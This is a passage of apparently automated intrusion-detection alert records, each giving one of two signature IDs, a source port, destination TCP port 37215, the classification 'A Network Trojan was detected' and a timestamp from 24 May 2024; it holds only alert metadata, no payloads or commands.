              SID:2829579
              Source Port:50642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537645
              SID:2835222
              Source Port:37144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280858
              SID:2835222
              Source Port:44626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286846
              SID:2829579
              Source Port:53284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568233
              SID:2829579
              Source Port:51390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449973
              SID:2829579
              Source Port:33326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400451
              SID:2829579
              Source Port:44262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455951
              SID:2835222
              Source Port:40796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197379
              SID:2829579
              Source Port:34036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540625
              SID:2835222
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532294
              SID:2835222
              Source Port:32992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770910
              SID:2829579
              Source Port:37342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.579949
              SID:2835222
              Source Port:39726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535844
              SID:2835222
              Source Port:35852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358470
              SID:2835222
              Source Port:59928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049042
              SID:2829579
              Source Port:59972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642113
              SID:2829579
              Source Port:38188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819878
              SID:2835222
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926046
              SID:2829579
              Source Port:34370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857127
              SID:2835222
              Source Port:51500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880783
              SID:2835222
              Source Port:36010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450115
              SID:2835222
              Source Port:54224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551279
              SID:2829579
              Source Port:32866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661883
              SID:2835222
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394139
              SID:2829579
              Source Port:42508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374823
              SID:2835222
              Source Port:40268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575288
              SID:2829579
              Source Port:40298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098708
              SID:2829579
              Source Port:59466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200995
              SID:2835222
              Source Port:32780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449247
              SID:2835222
              Source Port:35908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884547
              SID:2829579
              Source Port:34804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832425
              SID:2835222
              Source Port:52036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360620
              SID:2835222
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368759
              SID:2835222
              Source Port:41282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411180
              SID:2835222
              Source Port:44932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116164
              SID:2835222
              Source Port:43046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368831
              SID:2835222
              Source Port:50842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502391
              SID:2835222
              Source Port:34832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252636
              SID:2829579
              Source Port:37010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481600
              SID:2835222
              Source Port:49144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494624
              SID:2829579
              Source Port:47648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539351
              SID:2829579
              Source Port:49438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054037
              SID:2829579
              Source Port:48364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802009
              SID:2835222
              Source Port:36902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188151
              SID:2829579
              Source Port:41688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544142
              SID:2829579
              Source Port:52770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103470
              SID:2835222
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252815
              SID:2829579
              Source Port:59408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575160
              SID:2829579
              Source Port:33928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165056
              SID:2835222
              Source Port:43822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579625
              SID:2829579
              Source Port:48042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251717
              SID:2835222
              Source Port:34708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204419
              SID:2835222
              Source Port:40340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066287
              SID:2829579
              Source Port:47642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099860
              SID:2829579
              Source Port:52266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245168
              SID:2835222
              Source Port:38358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878134
              SID:2829579
              Source Port:55484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591803
              SID:2829579
              Source Port:43906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693458
              SID:2835222
              Source Port:53238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395132
              SID:2835222
              Source Port:39696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242039
              SID:2829579
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064521
              SID:2835222
              Source Port:51216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726554
              SID:2835222
              Source Port:57260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394553
              SID:2829579
              Source Port:40120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835080
              SID:2829579
              Source Port:34436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574413
              SID:2829579
              Source Port:56862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635645
              SID:2829579
              Source Port:49166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918218
              SID:2835222
              Source Port:46016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395495
              SID:2835222
              Source Port:40124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858930
              SID:2835222
              Source Port:59028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725098
              SID:2829579
              Source Port:54252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482908
              SID:2829579
              Source Port:33584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451924
              SID:2829579
              Source Port:59602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724916
              SID:2829579
              Source Port:43298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358909
              SID:2835222
              Source Port:47072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165575
              SID:2835222
              Source Port:38802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245804
              SID:2835222
              Source Port:45168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597880
              SID:2835222
              Source Port:46248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153147
              SID:2829579
              Source Port:35914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303865
              SID:2829579
              Source Port:48958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.593864
              SID:2829579
              Source Port:51390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827805
              SID:2829579
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235570
              SID:2835222
              Source Port:53598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482808
              SID:2829579
              Source Port:57742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076924
              SID:2835222
              Source Port:36324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201728
              SID:2829579
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280335
              SID:2835222
              Source Port:38198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162222
              SID:2835222
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540722
              SID:2829579
              Source Port:41472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044875
              SID:2829579
              Source Port:39192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428900
              SID:2829579
              Source Port:46588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474750
              SID:2835222
              Source Port:56992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063750
              SID:2829579
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604814
              SID:2829579
              Source Port:33342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664582
              SID:2829579
              Source Port:51656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705430
              SID:2835222
              Source Port:58366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886042
              SID:2835222
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433606
              SID:2835222
              Source Port:52594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685252
              SID:2835222
              Source Port:58948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987602
              SID:2829579
              Source Port:40992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531846
              SID:2835222
              Source Port:38396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707132
              SID:2829579
              Source Port:52482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.369655
              SID:2829579
              Source Port:43642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.275484
              SID:2835222
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130198
              SID:2829579
              Source Port:37040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446962
              SID:2835222
              Source Port:55628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799390
              SID:2835222
              Source Port:34000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430756
              SID:2829579
              Source Port:39230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232413
              SID:2829579
              Source Port:45236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100957
              SID:2835222
              Source Port:53134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.971054
              SID:2835222
              Source Port:48638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433519
              SID:2829579
              Source Port:55632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167349
              SID:2829579
              Source Port:43192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365168
              SID:2835222
              Source Port:36478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078731
              SID:2829579
              Source Port:58038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287812
              SID:2829579
              Source Port:59428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363268
              SID:2835222
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664479
              SID:2829579
              Source Port:56806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364408
              SID:2829579
              Source Port:40258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576458
              SID:2835222
              Source Port:52996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797093
              SID:2835222
              Source Port:39712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246507
              SID:2829579
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516469
              SID:2829579
              Source Port:45664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761983
              SID:2835222
              Source Port:47650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048642
              SID:2829579
              Source Port:43170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689741
              SID:2829579
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150947
              SID:2829579
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448288
              SID:2829579
              Source Port:51962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.369633
              SID:2829579
              Source Port:43058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097376
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160444
              SID:2829579
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246136
              SID:2835222
              Source Port:38820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428273
              SID:2829579
              Source Port:56628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.877868
              SID:2829579
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372064
              SID:2829579
              Source Port:36654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061892
              SID:2829579
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.062989
              SID:2829579
              Source Port:57888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280910
              SID:2829579
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430560
              SID:2835222
              Source Port:46492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484312
              SID:2829579
              Source Port:58722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547168
              SID:2829579
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108908
              SID:2829579
              Source Port:52344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579536
              SID:2835222
              Source Port:56230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520261
              SID:2829579
              Source Port:49472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279441
              SID:2835222
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080567
              SID:2829579
              Source Port:33618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764519
              SID:2835222
              Source Port:43338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689761
              SID:2835222
              Source Port:35754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066243
              SID:2835222
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689859
              SID:2835222
              Source Port:39526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595493
              SID:2835222
              Source Port:47044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483092
              SID:2835222
              Source Port:35094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073285
              SID:2835222
              Source Port:38402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502424
              SID:2835222
              Source Port:60152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232650
              SID:2829579
              Source Port:39464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445205
              SID:2829579
              Source Port:41866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516468
              SID:2829579
              Source Port:48602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333871
              SID:2829579
              Source Port:50176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447872
              SID:2835222
              Source Port:40686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.769186
              SID:2829579
              Source Port:41160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458329
              SID:2835222
              Source Port:46808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480138
              SID:2835222
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422272
              SID:2835222
              Source Port:53620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121529
              SID:2829579
              Source Port:54988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635908
              SID:2835222
              Source Port:59056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538092
              SID:2835222
              Source Port:45262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.867985
              SID:2829579
              Source Port:58168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128738
              SID:2835222
              Source Port:47088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596650
              SID:2829579
              Source Port:34798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062247
              SID:2835222
              Source Port:44534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368793
              SID:2835222
              Source Port:50450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433397
              SID:2829579
              Source Port:48324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409228
              SID:2829579
              Source Port:59678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199909
              SID:2835222
              Source Port:60004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168601
              SID:2829579
              Source Port:52688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116640
              SID:2835222
              Source Port:35036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149116
              SID:2835222
              Source Port:53096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482381
              SID:2835222
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377698
              SID:2829579
              Source Port:58770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819558
              SID:2835222
              Source Port:45906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520111
              SID:2829579
              Source Port:56486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063909
              SID:2835222
              Source Port:37000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920320
              SID:2829579
              Source Port:45622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363252
              SID:2835222
              Source Port:34380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431492
              SID:2829579
              Source Port:49464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680416
              SID:2829579
              Source Port:56986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923970
              SID:2829579
              Source Port:47180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638287
              SID:2835222
              Source Port:34180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162296
              SID:2829579
              Source Port:60762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522232
              SID:2829579
              Source Port:43686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858384
              SID:2835222
              Source Port:59786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128696
              SID:2829579
              Source Port:57416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535527
              SID:2829579
              Source Port:39604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067330
              SID:2835222
              Source Port:38016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281700
              SID:2829579
              Source Port:41934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517396
              SID:2835222
              Source Port:59700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639921
              SID:2829579
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880393
              SID:2829579
              Source Port:50222
              Destination Port:37215
